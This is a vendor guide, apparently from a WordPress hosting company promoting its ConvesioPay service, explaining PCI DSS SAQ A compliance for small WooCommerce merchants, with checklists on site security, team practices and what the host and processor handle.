PCI Compliance for Small Business: What You Actually Need to Do

PCI DSS compliance sounds intimidating, especially for small business owners without a dedicated security team. The good news: if you’re using a hosted payment solution, your actual compliance obligations are much smaller than you might think. This guide cuts through the complexity and tells you exactly what a small WooCommerce merchant needs to do.

1. The Key Insight: Your Payment Setup Determines Your Burden

PCI DSS compliance isn’t one-size-fits-all. The compliance requirements that apply to you depend almost entirely on how your payment system handles card data.

If your WooCommerce store uses a hosted checkout (like ConvesioPay’s payment widget), the cardholder enters their card details directly into a form hosted and secured by your payment processor. The card data goes straight from the customer’s browser to the processor’s servers, it never passes through your WordPress installation, your hosting server, or your database.

In this setup, the processor (in ConvesioPay’s case, Adyen, a PCI Level 1 certified service provider) is responsible for the hardest parts of PCI compliance. Your responsibility is limited to ensuring your website environment doesn’t compromise the checkout experience, essentially, keeping your WordPress site secure and not doing anything that would expose card data.

This qualifies you for SAQ A — the simplest Self-Assessment Questionnaire, designed exactly for this scenario.

2. What You Actually Need to Do (SAQ A)

For a small WooCommerce merchant on SAQ A, here’s the practical checklist:

Your Website

• Use HTTPS everywhere — your entire site, not just checkout. Free SSL certificates are available through Let’s Encrypt; Convesio provisions them automatically
• Keep WordPress updated — core, themes, and plugins. Outdated software is the most common attack vector for ecommerce sites
• Use strong passwords — minimum 12 characters for WordPress admin accounts; use a password manager
• Enable MFA on WordPress admin — two-factor authentication on your WordPress login
• Audit checkout page scripts — only load scripts on your checkout page from trusted sources; unauthorized scripts can be used to skim card data

Your Payment Processor Account

• Use strong, unique credentials — strong password and MFA on your ConvesioPay / Adyen dashboard account
• Limit access — only people who need access to the payment dashboard should have it
• Verify processor compliance — confirm your processor maintains PCI DSS Level 1 certification. ConvesioPay is powered by Adyen, which is PCI DSS Level 1 certified

Your Team

• Don’t store card data — never write down or store card numbers, CVV codes, or expiry dates. This includes not storing them in notes, spreadsheets, emails, or support tickets
• Know your incident response — if you suspect a breach, contact your payment processor immediately

Annual Compliance

• Complete the SAQ A annually — it’s a relatively short questionnaire that documents your compliance status. Submit it to your acquiring bank (through your payment processor)

3. What Your Hosting Provider Handles

When you use Convesio for WordPress hosting, the hosting layer covers significant security requirements:

• Server-level firewall and network security
• Isolated container architecture (no shared hosting risk)
• Automatic SSL/TLS certificate provisioning and renewal
• DDoS protection
• Server software patching and maintenance

This means the infrastructure-level security requirements in PCI DSS are handled, you’re responsible for the application layer (WordPress, plugins, and how you use the payment system).

4. What Your Payment Processor Handles

ConvesioPay (powered by Adyen) handles the most demanding PCI requirements:

• Secure storage and processing of all card data
• PCI DSS Level 1 certification (the highest level, covering over 6 million transactions/year)
• Encryption of card data in transit and at rest
• Tokenization — stored payment methods are represented as tokens, not raw card numbers
• Fraud and security monitoring of payment infrastructure

5. What You Must NOT Do

A few practices that would expand your PCI scope or create violations:

• Don’t use a payment plugin that sends card data through your server — some older or poorly designed WooCommerce payment plugins transmit card data through WordPress before sending it to the processor. If your plugin does this, it dramatically expands your PCI scope
• Don’t store CVV codes — even briefly. This is a serious PCI violation with significant penalties
• Don’t accept card numbers over phone/email and enter them manually — if customers call to give you their card details, that changes your scope entirely
• Don’t skip WordPress updates — unpatched vulnerabilities in WordPress or WooCommerce can create a path to compromise your checkout page

6. Finding Your SAQ and Submitting It

SAQ forms are available from the PCI Security Standards Council at pcisecuritystandards.org. Download the SAQ A form, complete it (it will take 30–60 minutes), and submit it to your acquiring bank or payment processor. ConvesioPay can provide guidance on where to submit your completed SAQ.

For broader PCI context, see PCI DSS Compliance Checklist: A Step-by-Step Guide for Merchants and PCI SAQ Types Explained: Which Self-Assessment Questionnaire Do You Need?